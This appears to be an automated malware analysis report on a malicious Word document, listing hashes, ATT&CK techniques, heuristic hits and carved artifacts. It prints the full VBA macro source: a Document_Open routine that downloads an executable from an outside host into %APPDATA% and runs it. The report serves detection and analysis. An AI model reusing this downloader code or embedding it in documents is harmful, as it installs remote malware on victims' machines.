Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 3e50b899730390f1…

MALICIOUS

Office (OOXML)

Size: 15.2 KB
Created: 2015-12-28 22:54:00 UTC
Authoring application: Microsoft Office Word 12.0000
First seen: 2021-06-04
MD5: dea628bb78f84b1f1ebf26bcb7fecb87
SHA-1: 30acede2fa88bc197d22fe3c555756b73b054555
SHA-256: 3e50b899730390f107046fa6ac7d0a0a6e097c5a10bd3d1af83fc262f661ba0b
Risk Score: 98

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1204.002 Malicious File
  • T1105 Ingress Tool Transfer
  • T1203 Exploitation for Client Execution

The sample contains a VBA macro with a Document_Open auto-execution subroutine. The macro uses URLDownloadToFileW to download a second-stage executable from http://firefly.fireflyproduce.xyz/install/data/test1.exe and saves it as %APPDATA%\test.exe. It then uses ShellExecuteW to run the downloaded file, which is downloader or dropper behaviour.

Heuristics (5)

  • VBA project inside OOXML (severity: medium; 3 related findings; rule: OOXML_VBA)
    Document contains a VBA project — VBA macros present
  • URLDownloadToFile in VBA (severity: critical; rule: OLE_VBA_DOWNLOAD)
    Matched lines in script:
      'Macro Name: wWefqPnB
      Private Declare Function bSMADket Lib "urlmon" Alias "URLDownloadToFileW" (ByVal GNtVQFWk As Long, ByVal lIbqcaOc As Long, ByVal eZSbThdG As Long, ByVal JUAwgCUx As Long, ByVal pQiRtXMp As Long) As Long
      Private Declare Function ULPlGsEh Lib "shell32.dll" Alias "ShellExecuteW" (ByVal zGxGTNvZ As Long, ByVal sXorKUKC As Long, ByVal XSWMXpCu As Long, ByVal COEhkKtm As Long, ByVal hJlCxfld As Long, ByVal METXKAdV As Long) As Long
  • Document_Open macro (severity: low; rule: OLE_VBA_DOCOPEN)
    Matched lines in script:
      Attribute VB_Customizable = True
      Private Sub Document_Open()
      wWefqPnB
  • Environ() call (env variable access) (severity: low; rule: OLE_VBA_ENVIRON)
    Matched lines in script:
      FVKIBHsz = "http://firefly.fireflyproduce.xyz/install/data/test1.exe"
      kQscOcjq = Environ("APPDATA") & "\test.exe"
      Call bSMADket(0, StrPtr(FVKIBHsz), StrPtr(kQscOcjq), 0, 0)
  • Embedded URL (severity: info; rule: EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    Extracted URLs:
      • http://firefly.fireflyproduce.xyz/install/data/test1.exe (referenced by macro)
      • http://schemas.openxmlformats.org/markup-compatibility/2006 (referenced by macro)
      • http://schemas.openxmlformats.org/officeDocument/2006/relationships (referenced by macro)
      • http://schemas.openxmlformats.org/officeDocument/2006/math (referenced by macro)
      • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing (referenced by macro)
      • http://schemas.openxmlformats.org/wordprocessingml/2006/main (referenced by macro)
      • http://schemas.microsoft.com/office/word/2006/wordml (referenced by macro)

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source from OOXML)
Size: 1199 bytes
SHA-256: c11e1f769b88ac2f702fc508ab8ce0d53da5570766c75d2948271c0e0d8f1e2b
Preview of extracted script (first 1,000 lines):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
wWefqPnB
End Sub

Attribute VB_Name = "Module1"
Option Explicit
'Macro Name: wWefqPnB
Private Declare Function bSMADket Lib "urlmon" Alias "URLDownloadToFileW" (ByVal GNtVQFWk As Long, ByVal lIbqcaOc As Long, ByVal eZSbThdG As Long, ByVal JUAwgCUx As Long, ByVal pQiRtXMp As Long) As Long
Private Declare Function ULPlGsEh Lib "shell32.dll" Alias "ShellExecuteW" (ByVal zGxGTNvZ As Long, ByVal sXorKUKC As Long, ByVal XSWMXpCu As Long, ByVal COEhkKtm As Long, ByVal hJlCxfld As Long, ByVal METXKAdV As Long) As Long
Public Sub wWefqPnB()
Dim FVKIBHsz As String, kQscOcjq As String
FVKIBHsz = "http://firefly.fireflyproduce.xyz/install/data/test1.exe"
kQscOcjq = Environ("APPDATA") & "\test.exe"
Call bSMADket(0, StrPtr(FVKIBHsz), StrPtr(kQscOcjq), 0, 0)
Call ULPlGsEh(0, StrPtr("Open"), StrPtr(kQscOcjq), 0, 0, 1)
End Sub
Private Sub Document_Open()
wWefqPnB
End Sub
Filename: vbaProject_00.bin
Kind: vba-project
Source: OOXML VBA project: word/vbaProject.bin
Size: 11776 bytes
SHA-256: 551affe3abb05c04429907bb3cd926889084a4f97c75446f5471118565d366ac